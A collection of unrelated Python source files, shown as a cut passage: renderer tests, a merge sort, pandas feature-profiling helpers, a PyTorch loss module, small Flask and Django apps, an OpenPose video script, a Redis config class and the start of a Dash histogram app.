        context = self.make_context(
            url=url, as_relationship='parent',
            override_path=self.api_reverse('feature-detail', pk=6))
        output = self.renderer.render(data, self.media_type, context)
        expected = {
            'links': {
                'self': url,
                'related': self.full_api_reverse('feature-parent', pk=6),
            },
            'data': {'type': 'features', 'id': '1'}
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_as_relationship_to_many_empty(self):
        """A relationship view for an empty to-many relation renders []."""
        data = {'children': []}
        url = self.full_api_reverse('feature-relationships-children', pk=6)
        context = self.make_context(
            url=url, as_relationship='children',
            override_path=self.api_reverse('feature-detail', pk=6))
        output = self.renderer.render(data, self.media_type, context)
        expected = {
            'links': {
                'self': url,
                'related': self.full_api_reverse('feature-children', pk=6),
            },
            'data': []
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_as_relationship_to_many(self):
        """A relationship view for a to-many relation renders identifier list."""
        data = {'children': [7, 8, 9]}
        url = self.full_api_reverse('feature-relationships-children', pk=6)
        context = self.make_context(
            url=url, as_relationship='children',
            override_path=self.api_reverse('feature-detail', pk=6))
        output = self.renderer.render(data, self.media_type, context)
        expected = {
            'links': {
                'self': url,
                'related': self.full_api_reverse('feature-children', pk=6),
            },
            'data': [
                {'type': 'features', 'id': '7'},
                {'type': 'features', 'id': '8'},
                {'type': 'features', 'id': '9'},
            ]
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_as_relationship_from_historical_to_current(self):
        """Test viewing the current resource ID from a historical resource.

        Such as:
        /api/v2/historical_browsers/relationships/browser
        """
        data = {'object_id': '100'}
        url = self.full_api_reverse(
            'historicalbrowser-relationships-browser', pk=200)
        context = self.make_context(
            url=url, as_relationship='browser',
            serializer=HistoricalBrowserSerializer,
            override_path=self.api_reverse('historicalbrowser-detail', pk=200))
        output = self.renderer.render(data, self.media_type, context)
        expected = {
            'data': {'type': 'browsers', 'id': '100'},
            'links': {
                'self': url,
                'related': self.full_api_reverse(
                    'historicalbrowser-browser', pk=200),
            },
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_archived_representation(self):
        """A historical resource nests its archived copy under archive_data."""
        data = {
            'id': 1,
            'changeset': 100,
            'event': 'created',
            'date': '2014-08-25T20:50:38.868903Z',
            'object_id': 200,
            'archived_representation': {
                'id': '200',
                'name': {'en': 'A Browser'},
                'note': None,
                'slug': 'browser',
                'links': {
                    'history_current': '1',
                    'versions': [],
                },
            },
        }
        url = self.full_api_reverse('historicalbrowser-detail', pk=1)
        browser_url = self.full_api_reverse('browser-detail', pk=200)
        context = self.make_context(
            url=url, serializer=HistoricalBrowserSerializer)
        output = self.renderer.render(data, self.media_type, context)
        expected = {
            'links': {'self': url},
            'data': {
                'id': '1',
                'type': 'historical_browsers',
                'attributes': {
                    'date': '2014-08-25T20:50:38.868903Z',
                    'event': 'created',
                    'archive_data': {
                        'id': '200',
                        'type': 'browsers',
                        'attributes': {
                            'slug': 'browser',
                            'name': {'en': 'A Browser'},
                            'note': None,
                        },
                        'relationships': {
                            'history_current': {
                                'data': {
                                    'type': 'historical_browsers',
                                    'id': '1',
                                },
                            },
                            'versions': {'data': []},
                        },
                        'links': {'self': browser_url},
                    },
                },
                'relationships': {
                    'browser': {
                        'data': {'type': 'browsers', 'id': '200'},
                        'links': {
                            'self': url + '/relationships/browser',
                            'related': url + '/browser',
                        },
                    },
                    'changeset': {
                        'data': {
                            'type': 'changesets',
                            'id': '100',
                        },
                        'links': {
                            'self': url + '/relationships/changeset',
                            'related': url + '/changeset',
                        },
                    },
                },
            },
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_construct_resource_uri_with_underscore(self):
        """Test constructing a URI for a resource type with an underscore.

        This happens when fetching the related historical items, such as:
        /api/v2/browsers/6/history
        """
        # The pattern for resource
        related_history = self.api_reverse('browser-history', pk='6')
        request = RequestFactory().get(related_history)
        self.renderer.request = request
        uri = self.renderer.construct_resource_uri(
            'historical_browsers', '100', {})
        expected = 'http://testserver/api/v2/historical_browsers/100'
        self.assertEqual(expected, uri)
|
class Merge_sort:
    """Classic top-down merge sort that sorts a list in place."""

    def sort(self, nums):
        """Sort ``nums`` (a list of mutually comparable items) in place.

        :type nums: List[int] -- the array to sort
        """
        self.merge_sort(nums, 0, len(nums)-1)

    def merge_sort(self, nums, left, right):
        """Recursively sort the inclusive slice nums[left..right]."""
        if left >= right:
            return
        mid = (left + right)//2
        self.merge_sort(nums, left, mid)
        self.merge_sort(nums, mid+1, right)
        self.merge_arr(nums, left, mid, right)

    def merge_arr(self, nums, left, mid, right):
        """Merge the sorted halves nums[left..mid] and nums[mid+1..right]."""
        span = right - left + 1
        merged = []
        i, j = left, mid+1
        while len(merged) < span:
            if self.less(nums, i, j, mid, right):
                merged.append(nums[i])
                i += 1
            else:
                merged.append(nums[j])
                j += 1
        # Copy the merged run back into place.
        nums[left:right+1] = merged

    def less(self, nums, i, j, mid, right):
        """Return True when the left-half candidate nums[i] is taken next.

        The left half wins when the right half is exhausted (j > right) or
        when its head is <= the right head (<= keeps the sort stable).
        """
        return j > right or (i <= mid and nums[i] <= nums[j])
if __name__ == '__main__':
    # Smoke-test the sorter on a small sample list (includes a duplicate).
    print("start")
    a = [1, 7, 3, 5, 4, 0, 20, 5]
    s = Merge_sort()
    s.sort(a)
    print(a)
    print("end")
|
import time
import sys
import dask.dataframe as dd
import pandas as pd
#from memory_profiler import profile
def timefunc(f):
    """Decorator that prints the wall-clock runtime of each call to *f*.

    Returns a wrapper that forwards all arguments and the return value
    unchanged, printing '... Time run ==> <name> took <secs> seconds'.
    """
    from functools import wraps

    # BUG FIX: without functools.wraps the wrapped function lost its
    # __name__/__doc__, which other tooling (and debugging) relies on.
    @wraps(f)
    def f_timer(*args, **kwargs):
        start = time.time()
        result = f(*args, **kwargs)
        end = time.time()
        print ('... Time run ==>' ,f.__name__, 'took', round(end - start,4), 'seconds' )
        return result
    return f_timer
def reduce_data_memory(data):
    """Shrink a DataFrame's memory footprint by downcasting numeric columns.

    Integer columns are downcast to the smallest unsigned type that holds
    them (signed/negative columns are left unchanged by pandas); float
    columns are downcast to float32 when lossless. Object columns are only
    inspected: a warning is printed for constant (single-value) columns.

    Mutates *data* in place and returns it.
    """
    for f in ['int','float','object']:
        if f=='object':
            data_object = data.select_dtypes(include=[f])
            for c in data_object.columns:
                if data_object[c].nunique()==1:
                    print('!!!object column '+c+' has only 1 value')
        else:
            # BUG FIX: downcast='unsigned' is a no-op for float columns, so
            # floats were never reduced; use the matching downcast target.
            downcast = 'float' if f == 'float' else 'unsigned'
            cols = data.select_dtypes(include=[f]).columns
            data[cols] = data[cols].apply(pd.to_numeric, downcast=downcast)
    return data
@timefunc
def read_data_with_cond(data_file_str,reduce_memory=False,cond_and_str=None,output_path_pre=None,sep='\t'):
    """Load a delimited file (dask first, pandas as fallback), optionally
    reduce memory and filter rows.

    data_file_str: path to a tab- (sep='\\t') or comma- (sep=',') separated
        file; the 'uid' column is forced to str so leading zeros survive.
    reduce_memory: if True, downcast numeric columns via reduce_data_memory().
    cond_and_str: comma-joined AND-ed row filters, each one of 'col>=n',
        'col==n' (n parsed as int) or 'col.isnull'.
    output_path_pre: if given, write '<prefix>columns.csv' listing column
        names and dtypes.
    Returns the resulting pandas DataFrame.
    """
    import re
    print('----------------begin------------------')
    try:
        # Prefer dask for out-of-core reading, then materialize to pandas.
        if sep=='\t':
            data = dd.read_table(data_file_str,low_memory=False,dtype={'uid': 'object'}).compute()
        if sep==',':
            data = dd.read_csv(data_file_str,low_memory=False,dtype={'uid': 'object'}).compute()
    # BUG FIX: the bare 'except:' also swallowed KeyboardInterrupt/SystemExit;
    # Exception keeps the intended best-effort fallback to plain pandas.
    except Exception:
        if sep=='\t':
            data = pd.read_table(data_file_str,low_memory=False,dtype={'uid': 'object'})
        if sep==',':
            data = pd.read_csv(data_file_str,low_memory=False,dtype={'uid': 'object'})
    print('--initial')
    print(data.info())
    if reduce_memory:
        print('--reduce_memory')
        data = reduce_data_memory(data)
        print(data.info())
    if cond_and_str:
        print('--cond')
        cnt=1
        for cond in cond_and_str.split(','):
            # 'col>=n': keep rows where col >= n.
            pattern = re.compile(r'^.*>=.*$')
            if pattern.match(cond):
                f,n = cond.split('>=')[0],int(cond.split('>=')[1])
                data = data[data[f]>=n]
                print('shape of data after cond',cnt,':',data.shape)
            # 'col==n': keep rows where col == n.
            pattern = re.compile(r'^.*==.*$')
            if pattern.match(cond):
                f,n = cond.split('==')[0],int(cond.split('==')[1])
                data = data[data[f]==n]
                print('shape of data after cond',cnt,':',data.shape)
            # 'col.isnull': keep rows where col is missing.
            pattern = re.compile(r'^.*isnull.*$')
            if pattern.match(cond):
                f = cond.split('.')[0]
                data = data[data[f].isnull()]
                print('shape of data after cond',cnt,':',data.shape)
            cnt+=1
        print(data.info())
    print('------------conclusion---------------')
    print('shape of dataset:',data.shape)
    print('-------------outputs------------------')
    if output_path_pre:
        columns = pd.DataFrame(data.dtypes)
        columns = columns.reset_index()
        columns.columns = ['feature_name','dtypes']
        columns.to_csv(output_path_pre+'columns.csv',index=False,header=True)
        print('column names and dtypes have been downloaded to ',output_path_pre+'columns.csv')
    return data
@timefunc
def remove_high_relevance(train,featuresList,method='pearson',threshold=0.9):
    """Return a list of numeric features to drop due to high correlation.

    For every unordered pair of numeric features with |corr| > threshold,
    the feature with fewer non-null values is marked for removal. `method`
    is passed through to DataFrame.corr ('pearson', 'spearman', ...).
    Note: O(n^2) pairwise scan over the numeric features.
    """
    from tqdm import tqdm
    numeric_features = [c for c in featuresList if ('int' in str(train[c].dtypes) or 'float' in str(train[c].dtypes))]
    print('the length of numeric features is:',len(numeric_features))
    removeSet=set()
    iSet = set()  # features already used on the 'i' side: avoids mirrored pairs
    for i in tqdm(numeric_features):
        if i in removeSet:
            continue
        iSet.add(i)
        for j in numeric_features:
            if j in removeSet or j in iSet:
                continue
            pearsonr = (train[[i,j]].corr(method=method).loc[i,j])
            if abs(pearsonr)>threshold:
                print('pearsonr of',i,'and',j,'is',pearsonr,end='! ')
                # Keep the feature with more non-null values.
                if train[i].count()>=train[j].count():
                    removeSet.add(j)
                    print('remove',j)
                else:
                    removeSet.add(i)
                    print('remove',i)
                    # FIX: i itself was just dropped, so stop comparing it
                    # (the original kept iterating and re-checked membership
                    # on every remaining j).
                    break
    return list(removeSet)
@timefunc
def get_features_attr(data,idList_str=None,targetList_str=None,featuresList=None,missing_warn=0.99,remove=None,output_path_pre=None):
    """Profile candidate features: missing rates, constant columns, dtypes.

    data: input DataFrame.
    idList_str / targetList_str: comma-joined ID and target column names,
        used to derive featuresList when it is not given.
    missing_warn: missing-rate threshold that triggers a warning (and removal
        when remove['missing'] is set).
    remove: dict with keys 'list' (comma-joined names to drop), 'missing'
        and 'single' (bools enabling removal of over-missing / constant
        features). Defaults to no removal.
    output_path_pre: path prefix for features.pkl, feature_missing.csv and
        feature_describe.xlsx outputs.
    Returns (featuresList, feature_missing) where feature_missing is a
    DataFrame of [feature_name, missing_rate, dtype] (or an empty list when
    nothing is missing).
    """
    import pickle
    import openpyxl
    # BUG FIX: the default was a shared mutable dict argument; build it per
    # call instead (same default behavior for existing callers).
    if remove is None:
        remove = {'list': None, 'missing': False, 'single': False}
    if featuresList is None:
        idList = idList_str.split(',')
        targetList = targetList_str.split(',')
        featuresList = [c for c in data.columns if c not in idList and c not in targetList]
    if remove['list']:
        removeList = remove['list'].split(',')
        featuresList = [c for c in featuresList if c not in removeList]
        print('---------------------removelist-----------------')
        print('remove',len(removeList),'features')
    print('----------------missing-------------------')
    feature_missing = []
    remove_missing = []
    for i in featuresList:
        if data[i].count()/data.shape[0]<1:
            feature_missing.append([i,round(1-data[i].count()/data.shape[0],4),str(data[i].dtypes)])
            if 1-data[i].count()/data.shape[0]>missing_warn:
                print('!!!WARN missing_rate of',i,'is',round(1-data[i].count()/data.shape[0],4))
                if remove['missing']:
                    remove_missing.append(i)
                    # Drop the entry just appended: it is being removed.
                    del feature_missing[-1]
    if len(feature_missing)>0:
        feature_missing = pd.DataFrame(feature_missing)
        feature_missing.columns = ['feature_name','missing_rate','dtype']
        # BUG FIX: sort_values returns a new frame; the result was discarded.
        feature_missing = feature_missing.sort_values(by=['missing_rate'],ascending=False)
        if len(remove_missing)>0:
            print('remove',len(remove_missing),'missing features,','remaining',feature_missing.shape[0],'missing features')
        else:
            print('there are',feature_missing.shape[0],'missing features')
    else:
        print('remove',len(remove_missing),'missing features,','remaining',0,'missing features')
    print('------------------single---------------------')
    remove_single=[]
    for i in featuresList:
        if data[i].nunique()<=1:
            print('!!!WARN nunique of',i,'is only',data[i].nunique())
            if remove['single']:
                remove_single.append(i)
    if len(remove_single)>0:
        print('remove',len(remove_single),'features with single value')
    print('--------------------totally---------------------')
    featuresList = [c for c in featuresList if c not in remove_missing and c not in remove_single]
    print('numbers of features:',len(featuresList))
    # Count features per dtype for the summary printout.
    dtypes_df = pd.DataFrame(data[featuresList].dtypes).reset_index().groupby([0]).count().reset_index()
    for i in dtypes_df[0]:
        print('--numbers of',i,'features are:',dtypes_df[dtypes_df[0]==i]['index'].values[0])
    print('-------------outputs------------------')
    if output_path_pre:
        with open(output_path_pre+'features.pkl','wb') as f:
            pickle.dump(featuresList,f)
        print('feature list has been downloaded to ',output_path_pre+'features.pkl')
    if output_path_pre and len(feature_missing)>0:
        feature_missing.to_csv(output_path_pre+'feature_missing.csv',index=False,header=True,float_format='%0.2f')
        print('missing features has been downloaded to ',output_path_pre+'feature_missing.csv')
    if output_path_pre:
        # NOTE(review): pd.ExcelWriter.save() is deprecated in newer pandas
        # (use close()); kept as-is to match the project's pandas version.
        writer = pd.ExcelWriter(output_path_pre+'feature_describe.xlsx')
        for d in data[featuresList].dtypes.unique():
            data[featuresList].select_dtypes(include=[d]).describe().T.to_excel(writer,str(d))
        writer.save()
        print('features describe has been downloaded to ',output_path_pre+'feature_describe.xlsx')
    return featuresList,feature_missing
@timefunc
def display_x_y(data,features_list,target_str,output_path_pre,target_type='category'):
    """Explore every feature against the target and save plots/tables.

    data            : DataFrame containing the features and the target column.
    features_list   : list of feature names, or a path to a pickled list.
    target_str      : name of the target column.
    output_path_pre : path prefix for every output file.
    target_type     : 'category' -> boxplots/crosstabs for a class target;
                      anything else -> scatter/box plots for a numeric target.

    Outputs (depending on dtypes present): float_plot.pdf, int_plot.pdf,
    int_tab.xlsx, object_tab.xlsx, object_plot.pdf.
    """
    import seaborn as sns
    import matplotlib.pyplot as plt
    import pickle
    import re
    from matplotlib.backends.backend_pdf import PdfPages
    from tqdm import tqdm
    import numpy as np
    if isinstance(features_list,str):
        # A string is treated as a path to a pickled feature list.
        with open(features_list, 'rb') as f:
            featuresList = pickle.load(f)
    else:
        featuresList = features_list
    target = target_str
    if target_type=='category':
        # float
        pattern = re.compile(r'^.*float.*$')
        float_features = [c for c in featuresList if pattern.match(str(data[c].dtypes)) and data[c].nunique()>2]
        # Binary-valued floats are tabulated with the object features below.
        object_features = [c for c in featuresList if pattern.match(str(data[c].dtypes)) and data[c].nunique()<=2]
        if len(float_features)>0:
            print('--------exploring float features--------')
            with PdfPages(output_path_pre+'float_plot.pdf') as pdf:
                for i in tqdm(float_features):
                    fig = plt.figure(figsize=(8, 6))
                    sns.boxplot(x=target, y=i, data=pd.concat([data[target], data[i]], axis=1),showfliers=False)
                    pdf.savefig(fig)
            print('plots have been saved at',output_path_pre+'float_plot.pdf')
        #int
        pattern = re.compile(r'^.*int.*$')
        int_features = [c for c in featuresList if pattern.match(str(data[c].dtypes))]
        if len(int_features)>0:
            print('-------------exploring int features----------')
            # Few-valued ints get crosstabs; many-valued ints get boxplots.
            int_tab_features = [c for c in int_features if data[c].nunique()<=3]
            if len(int_tab_features)>0:
                with pd.ExcelWriter(output_path_pre+'int_tab.xlsx') as writer:
                    for i in tqdm(int_tab_features):
                        crosstab_num = data[[target,i]].pivot_table(index=[target],columns=i,aggfunc=len,margins=True)
                        # Column-wise frequencies relative to the 'All' margin.
                        crosstab_freq = pd.DataFrame(np.array(crosstab_num)/np.array(crosstab_num.loc['All',:]).reshape((1,-1)))
                        crosstab_freq.columns,crosstab_freq.index = crosstab_num.columns,crosstab_num.index
                        crosstab_freq.to_excel(writer,i)
                print('tables have been saved at',output_path_pre+'int_tab.xlsx')
            int_plot_features = [c for c in int_features if data[c].nunique()>3]
            if len(int_plot_features)>0:
                with PdfPages(output_path_pre+'int_plot.pdf') as pdf:
                    for i in tqdm(int_plot_features):
                        fig = plt.figure(figsize=(8, 6))
                        sns.boxplot(x=target, y=i, data=pd.concat([data[target], data[i]], axis=1),showfliers=False)
                        pdf.savefig(fig)
                print('plots have been saved at',output_path_pre+'int_plot.pdf')
        #object
        object_features += [c for c in featuresList if data[c].dtypes=='object']
        if len(object_features)>0:
            print('-------------exploring object features----------')
            with pd.ExcelWriter(output_path_pre+'object_tab.xlsx') as writer:
                for i in tqdm(object_features):
                    # Keep only the 10 most frequent levels so tables stay small.
                    object_values = list(data.groupby(i).size().sort_values(ascending=False).index[:10])
                    corsstab_data = data[data[i].isin(object_values)].fillna(-999)
                    crosstab_num = corsstab_data[[target,i]].pivot_table(index=[target],columns=i,aggfunc=len,margins=True)
                    crosstab_freq = pd.DataFrame(np.array(crosstab_num)/np.array(crosstab_num.loc['All',:]).reshape((1,-1)))
                    crosstab_freq.columns,crosstab_freq.index = crosstab_num.columns,crosstab_num.index
                    crosstab_freq.to_excel(writer,i)
            print('tables have been saved at',output_path_pre+'object_tab.xlsx')
    else:
        # Numeric target: scatter plots instead of class-wise boxplots.
        # float
        pattern = re.compile(r'^.*float.*$')
        float_features = [c for c in featuresList if pattern.match(str(data[c].dtypes)) and data[c].nunique()>2]
        object_features = [c for c in featuresList if pattern.match(str(data[c].dtypes)) and data[c].nunique()<=2]
        if len(float_features)>0:
            print('--------exploring float features--------')
            with PdfPages(output_path_pre+'float_plot.pdf') as pdf:
                for i in tqdm(float_features):
                    fig = plt.figure(figsize=(8, 6))
                    plt.scatter(x=i, y=target, data=pd.concat([data[target], data[i]], axis=1))
                    plt.xlabel(i)
                    plt.ylabel(target)
                    pdf.savefig(fig)
            print('plots have been saved at',output_path_pre+'float_plot.pdf')
        #int
        pattern = re.compile(r'^.*int.*$')
        int_features = [c for c in featuresList if pattern.match(str(data[c].dtypes))]
        print('-------------exploring int features----------')
        if len(int_features)>0:
            with PdfPages(output_path_pre+'int_plot.pdf') as pdf:
                for i in tqdm(int_features):
                    if data[i].nunique()>3:
                        fig = plt.figure(figsize=(8, 6))
                        plt.scatter(x=i, y=target, data=pd.concat([data[target], data[i]], axis=1))
                        plt.xlabel(i)
                        plt.ylabel(target)
                        pdf.savefig(fig)
                    else:
                        fig = plt.figure(figsize=(8, 6))
                        sns.boxplot(x=i, y=target, data=pd.concat([data[target], data[i]], axis=1),showfliers=False)
                        pdf.savefig(fig)
            print('plots have been saved at',output_path_pre+'int_plot.pdf')
        #object
        object_features += [c for c in featuresList if data[c].dtypes=='object']
        if len(object_features)>0:
            print('-------------exploring object features----------')
            # Bug fix: this previously wrote to 'int_plot.pdf', clobbering the
            # int-feature plots; write 'object_plot.pdf' as announced below.
            with PdfPages(output_path_pre+'object_plot.pdf') as pdf:
                for i in tqdm(object_features):
                    fig = plt.figure(figsize=(8, 6))
                    sns.boxplot(x=i, y=target, data=pd.concat([data[target], data[i]], axis=1),showfliers=False)
                    pdf.savefig(fig)
            print('tables have been saved at',output_path_pre+'object_plot.pdf')
|
from roboclaw import *
# Drive both motor channels forward at speed 16 on controller address 128.
M1Forward(128,16)
M2Forward(128,16)
# NOTE(review): this drives M2 on a second controller (address 129) --
# presumably intentional, but confirm it is not a typo for M1Forward(129,16).
M2Forward(129,16)
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.init as init
import torch.nn.functional as F
from torch.autograd import Variable
def l2norm2d(inputs, k):
    """L2-normalize ``inputs`` along dimension ``k``.

    A small epsilon (1e-12) added to the norm guards against division by
    zero for all-zero slices.
    """
    # keepdim=True keeps the reduced axis so the division broadcasts over it
    # (the original relied on legacy torch's sum() keeping the dim, which
    # breaks on modern torch where sum() squeezes the axis).
    norm = torch.sqrt(torch.sum(inputs * inputs, k, keepdim=True)) + 1e-12
    return inputs / norm
class ClassifyLoss(nn.Module):
    """Binary classification head plus cross-entropy loss.

    Builds either a fixed two-layer head (nFeats_in -> nFeats_out -> 2) or,
    when ``layer_list`` is given, a configurable MLP ending in 2 logits.
    ``forward`` returns the loss and caches the predicted class indices in
    ``self.score`` for ``check_result``.
    """
    # max pooling over nodes in one statement.
    def __init__(self, nFeats_in=None, nFeats_out=None, layer_list=None,
                 dropout=0, bias=False):
        super(ClassifyLoss, self).__init__()
        self.dropout = dropout
        if layer_list is None:
            # Fixed two-layer head.
            self.list = False
            self.l1 = nn.Linear(nFeats_in, nFeats_out, bias=bias)
            if self.dropout > 0:
                self.l1dropout = nn.Dropout(self.dropout, inplace=True)
            # NOTE(review): init.kaiming_normal is the pre-0.4 spelling of
            # kaiming_normal_; consistent with the legacy torch used here.
            init.kaiming_normal(self.l1.weight)
            self.l2 = nn.Linear(nFeats_out, 2)
            init.kaiming_normal(self.l2.weight)
            self.bn1 = nn.BatchNorm1d(nFeats_out)
            self.relu = nn.ReLU(inplace=True)
        else:
            # Configurable MLP: Linear + BatchNorm per step in layer_list,
            # then a final projection to 2 logits.
            self.list = True
            self.hids = nn.ModuleList()
            self.bns = nn.ModuleList()
            if self.dropout > 0:
                self.dropout_l = nn.Dropout(inplace=True)
            for i in range(len(layer_list) - 1):
                self.hids.append(nn.Linear(layer_list[i], layer_list[i+1], bias=False))
                init.kaiming_normal(self.hids[-1].weight)
                self.bns.append(nn.BatchNorm1d(layer_list[i+1]))
            self.lout = nn.Linear(layer_list[-1], 2)
            init.kaiming_normal(self.lout.weight)
        self.crossentropy = nn.CrossEntropyLoss()
        # Predicted class indices from the most recent forward() call.
        self.score = None
    def check_result(self, y):
        # Count how many cached predictions match the labels in y
        # (y is a list of tensors, like in forward()).
        y = torch.cat(y).data
        correct = self.score.eq(y).cpu().sum()
        return correct
    def forward(self, x, y):
        # x and y arrive as lists of tensors -- concatenate into one batch.
        y_ = torch.cat(y)
        x = torch.cat(x, 0)
        if not self.list:
            x = self.l1(x)
            x = self.bn1(x)
            x = self.relu(x)
            if self.dropout > 0:
                x = self.l1dropout(x)
            x = self.l2(x)
        else:
            for i in range(len(self.hids)):
                x = self.hids[i](x)
                x = self.bns[i](x)
                x = F.relu(x, inplace=True)
                if self.dropout > 0:
                    x = self.dropout_l(x)
            x = self.lout(x)
        # Cache argmax predictions for check_result().
        self.score = x.data.max(1)[1]
        loss = self.crossentropy(x, y_)
        return loss
|
from flask import render_template,request
from DCapi import app
from DCapi.humanresource.data.user import users
@app.route('/',methods=['get','post'])
def index():
    # Root endpoint; currently a placeholder response.
    return '11'
    #return render_template('test.html',url='/login',form=True)
@app.route('/login',methods=['get','post'])
def login():
    """Check the posted form against the known users.

    NOTE(review): ``formdata in users['user']`` tests membership of the whole
    form dict inside ``users['user']`` -- confirm that matches the structure
    of the ``users`` data.
    """
    formdata=request.form.to_dict()
    if formdata in users['user']:
        return render_template('test.html',table=True)
    else:
        # Bug fix: a Flask view must not return a bool (returning False
        # raised a 500 TypeError); return an explicit failure response.
        return 'login failed', 401
@app.route('/main',methods=['get','post'])
def mainpage():
    # Render the main page template.
    return render_template('main.html')
@app.route('/test',methods=['get','post'])
def test():
    # Smoke-test endpoint.
    return 'test'
    #return render_template('testjinjia.html')
@app.route('/test01',methods=['get','post'])
def test01():
    # Render the first test template.
    return render_template('test01.html')
@app.route('/test02',methods=['get','post'])
def test02():
    # Render the second test template.
    return render_template('test02.html')
"""
Example script using PyOpenPose.
"""
import argparse
from libs import pyopenpose as op
import time
import cv2
import os
OPENPOSE_ROOT = os.environ["OPENPOSE_ROOT"]
def run():
    """Run OpenPose over the video given by --file, saving single-person
    frames (original + rendered landmarks) to ./original and ./landmarks.

    Frames with no person or more than one person are skipped and counted
    as ``wasted``.
    """
    cap = cv2.VideoCapture(args.filename)
    params = dict()
    params["model_folder"] = OPENPOSE_ROOT + os.sep + "models" + os.sep
    params["face"] = True
    params["hand"] = True
    params["disable_blending"] = False
    #op = OP.OpenPose((656, 368), (368, 368), (1280, 720), "COCO", OPENPOSE_ROOT + os.sep + "models" + os.sep, 0,
    #                 False, OP.OpenPose.ScaleMode.ZeroToOne, with_face, with_hands)
    opWrapper = op.WrapperPython()
    opWrapper.configure(params)
    opWrapper.start()
    paused = False
    delay = {True: 0, False: 1}
    count = 0
    wasted = 0
    print("Entering main Loop.")
    datum = op.Datum()
    while True:
        try:
            _, frame = cap.read()
            if frame is None:
                # End of stream.
                break
        except Exception as e:
            print("Failed to grab", e)
            break
        datum.cvInputData = frame
        opWrapper.emplaceAndPop([datum])
        # print("Body keypoints: \n" + str(datum.poseKeypoints))
        # print("Face keypoints: \n" + str(datum.faceKeypoints))
        # print("Left hand keypoints: \n" + str(datum.handKeypoints[0]))
        # print("Right hand keypoints: \n" + str(datum.handKeypoints[1]))
        persons = datum.poseKeypoints
        if persons is None:
            print("No Person")
            wasted+=1
            continue
        # Keep only frames with exactly one detected person; a TypeError from
        # len() (scalar/empty keypoints) is also treated as unusable.
        try:
            if persons is not None and len(persons) > 1:
                print("Person > 1 ", persons[0].shape)
                wasted+=1
                continue
        except TypeError:
            wasted+=1
            continue
        # NOTE(review): cv2.waitKey is commented out below, so this window may
        # never refresh; cap.release()/destroyAllWindows are also missing.
        cv2.imshow("OpenPose result", datum.cvOutputData)
        count += 1
        print("count : ", count, " / ","wasted : ", wasted)
        cv2.imwrite("original/{}.png".format(count), datum.cvInputData)
        cv2.imwrite("landmarks/{}.png".format(count), datum.cvOutputData)
        '''
        key = cv2.waitKey(delay[paused])
        if key & 255 == ord('p'):
            paused = not paused
        if key & 255 == ord('q'):
            break
        '''
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--file', dest='filename', type=str, help='Name of the video file.')
    args = parser.parse_args()
    # makedirs(exist_ok=True) replaces the racy exists()-then-makedirs pair.
    os.makedirs(os.path.join('./', 'original'), exist_ok=True)
    os.makedirs(os.path.join('./', 'landmarks'), exist_ok=True)
    run()
|
"""undeadthread URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
import sys
from django.http import HttpResponse
ONE_UNDEAD_THREAD_FLAG = False
def undeadthread(request):
    """Spawn the background logging loop as a daemon thread and confirm."""
    from threading import Thread

    worker = Thread(target=loop, daemon=True)
    worker.start()
    return HttpResponse("it works")
def loop():
    # Print a timestamp to stderr every 2 seconds, forever. The module-level
    # flag ensures only the first started thread keeps looping.
    global ONE_UNDEAD_THREAD_FLAG
    from time import sleep, ctime
    # NOTE(review): this check-then-set is not atomic -- two threads started
    # close together can both pass the check and both loop; add a lock if
    # that matters.
    if not ONE_UNDEAD_THREAD_FLAG:
        ONE_UNDEAD_THREAD_FLAG = True
    else:
        return
    while True:
        print(ctime(), file=sys.stderr)
        sleep(2)
# Admin site plus the thread-spawning demo endpoint.
urlpatterns = [
    path('admin/', admin.site.urls),
]
urlpatterns += [
    path('undeadthread', undeadthread),
]
|
# -*- coding: utf-8 -*-
# @Time : 2019/5/16 2:29 PM
# @Author : Shande
# @Email : seventhedog@163.com
# @File : db_config.py
# @Software: PyCharm
class DBConfig(object):
    """Redis connection settings.

    db layout:
        db=1: user login
    """
    _redis_conf = {
        'host': '101.132.186.25',
        # 'host': '47.100.63.158',
        # 'host': '127.0.0.1',
        'port': 6379,
        'password': '',
    }

    @classmethod
    def _conf_value(cls, key):
        """Look up a single entry from the redis configuration."""
        return cls._redis_conf.get(key)

    @classmethod
    def get_redis_host(cls):
        """Return the configured redis host."""
        return cls._conf_value('host')

    @classmethod
    def get_redis_port(cls):
        """Return the configured redis port."""
        return cls._conf_value('port')
|
"""
Dash port of Shiny faithful example:
https://shiny.rstudio.com/gallery/faithful.html
Note: the shiny version includes a slider for adjusting the bandwidth of the
density approximation curve, which is not easily adjusted when using
plotly.figure_factory.create_distplot, so it doesn't feature in this example.
"""
import dash
import dash_bootstrap_components as dbc
import pandas as pd
import plotly.figure_factory as ff
from dash import Input, Output, dcc, html
# Old Faithful eruption data, fetched once at import time.
# NOTE(review): importing this module requires network access.
DATA = pd.read_csv("https://cdn.opensource.faculty.ai/old-faithful/data.csv")
app = dash.Dash(external_stylesheets=[dbc.themes.BOOTSTRAP])
# Control: approximate number of histogram bins.
dropdown = html.Div(
    [
        dbc.Label("Number of bins in histogram (approximate):"),
        dcc.Dropdown(
            id="dropdown",
            options=[{"label": n, "value": n} for n in [10, 20, 35, 50]],
            value=20,
        ),
    ]
)
# Control: optional rug-plot and density-estimate overlays.
checklist = html.Div(
    [
        dbc.Label("Extras:"),
        dbc.Checklist(
            id="checklist",
            options=[
                {"label": "Show individual observations", "value": "show_ind"},
                {"label": "Show density estimate", "value": "show_dens"},
            ],
            value=[],
            inline=True,
        ),
    ]
)
# Page layout: heading, the two controls side by side, then the graph.
app.layout = dbc.Container(
    [
        html.H1("Old Faithful eruption data"),
        html.Hr(),
        dbc.Row(
            [
                dbc.Col(dropdown),
                dbc.Col(checklist, width="auto", align="center"),
            ]
        ),
        html.Br(),
        dcc.Graph(id="graph"),
    ]
)
@app.callback(
